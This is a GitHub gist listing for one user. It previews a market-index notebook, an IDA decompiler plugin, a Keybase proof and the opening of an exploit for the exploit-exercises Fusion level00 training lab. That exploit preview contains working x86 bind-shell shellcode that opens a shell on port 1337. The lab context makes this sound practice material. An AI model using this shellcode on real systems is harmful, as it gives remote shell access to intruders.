Skip to content

Instantly share code, notes, and snippets.

View a0rtega's full-sized avatar

Alberto Ortega a0rtega

View GitHub Profile
@a0rtega
a0rtega / gauge_fear_greed.ipynb
Created April 28, 2022 16:57
CNN Fear & Greed Index with Python and Plotly
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@a0rtega
a0rtega / hexrays_allthethings.py
Created August 30, 2021 14:05
IDA plugin to decompile all functions at once to cache the result and avoid IDA's on-the-fly decompilation
# Installation: Copy hexrays_allthethings.py to the plugins/ directory of IDA, restart IDA
# Usage: Edit->Plugins->"Run Hex-Rays decompiler on all functions" or use Ctrl+9
# Tested in IDA 7.6, Python 3
# https://github.com/a0rtega
import ida_kernwin, ida_idaapi, ida_auto
import tempfile, os
class HexRaysAllTheThingsPlugin(ida_idaapi.plugin_t):
flags = ida_idaapi.PLUGIN_KEEP
@a0rtega
a0rtega / level00
Created April 28, 2015 13:37
exploit-exercises fusion level00 level01 level02
# Exploit for https://exploit-exercises.com/fusion/level00/
# a0rtega
from struct import pack
import socket
# Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
### Keybase proof
I hereby claim:
* I am a0rtega on github.
* I am alberto (https://keybase.io/alberto) on keybase.
* I have a public key whose fingerprint is 05A3 BBB7 872E 4763 CE74 7DD8 D528 44D8 6A06 CF5A
To claim this, I am signing this object: